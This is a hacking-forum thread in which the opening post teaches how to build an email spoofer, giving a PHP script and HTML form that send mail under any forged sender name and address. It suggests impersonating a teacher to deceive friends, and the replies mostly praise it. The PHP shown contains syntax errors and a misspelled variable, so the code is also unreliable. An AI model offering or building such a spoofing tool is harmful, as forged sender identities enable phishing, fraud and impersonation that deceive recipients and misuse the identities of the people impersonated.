Login Register




The stories and information posted here are artistic works of fiction and falsehood. Only a fool would take anything posted here as fact.


How to create an Email Spoofer filter_list
Author
Message
How to create an Email Spoofer #1
Email spoofing huh? Yes.
Email spoofing is great for sending anonymous emails and is pretty awesome use.
You can e.g send an email to all your friends from your teachers mail and say that class is closed.
Today I'm going to tell you how to create your own email spoofer!

For this you'll have to need.

1. A webhost.
2. Simple PHP and HTML knowledge.


Alright, first we're going to create the PHP script.
This is the PHP script:

Code:
<?php $to_email = $_REQUEST['email']; $name = $_REQUEST['name']; $sender_email = $_REQUEST['sender'] $subject = $_REQUEST['subject']; $contect = $_REQUEST['content']; $header = "From: $name","<$sender_email>\r\n"; mail($to_email,$subject,$content,$header); echo 'Sent Successfully!'; ?>

Now, let's create the HTML form.
Here's the code. (You can obviously change it to fit your website or make it look better, this is just for the sake of the tutorial.)

Code:
<html> <head><title>Email Spoofer</title></head> <body> <form action="spoof.php" method=post> To Email: </td><td><input type=text name=email size=30> <br/> Sender Name: </td><td><input type=text name=name size=30> <br/> Sender Email: </td><td><input type=text name=sender size=30> <br/> Subject: </td><td><input type=text name=subject size=30> <br/> Content: </td><td><input type=text name=content size=30> <br/> <input type=submit value="Send Mail"> </form> </body> </html>

NOTE: For this tutorial I named the PHP file "spoof.php", but you can change that to whatever you like.
But remember to change it in the HTML code later!


When you have the two files, upload them to your favorite webhost.
I suggest using 3owl, it's amazing.

Upload the two files and go to your website.
Enter the info and click "Send Mail".

Now, if you've done everything correct the email you entered should recieve an email with the info you entered! :3

Reply

RE: How to create an Email Spoofer #2
This is a really good tut man, thanks alot for sharing!!!

Reply

RE: How to create an Email Spoofer #3
(07-01-2014, 05:32 PM)Hustler Wrote: This is a really good tut man, thanks alot for sharing!!!

No problemo! :3

Reply

RE: How to create an Email Spoofer #4
It would be better if you'd actually explain some parts of the code in order for us to learn what it actually does rather than everyone just copy / pasting the script.

Nice share though!
[Image: 5R6Js8r.gif]

Reply

RE: How to create an Email Spoofer #5
This is a great way, or you can just use https://www.guerrillamail.com/ That way, Your always anonymous :epic:







Reply

RE: How to create an Email Spoofer #6
very nice

Reply

RE: How to create an Email Spoofer #7
Nice Tuto But Spoofing Is not A Sollution For manny Probs But thanks anyway Great Share Smile

Reply

RE: How to create an Email Spoofer #8
That's nice man .... I really appreciate it Biggrin

Reply

RE: How to create an Email Spoofer #9
Thanks For the Tutorial !! really great share ! But it didnt Work For me

Reply

RE: How to create an Email Spoofer #10
(07-05-2014, 09:19 PM)Shallex Wrote: Thanks For the Tutorial !! really great share ! But it didnt Work For me
did u modify the php script?
could u please elaborate how it didnt work for you?

p.s great post Biggrin
- Trust is your weakness....




Reply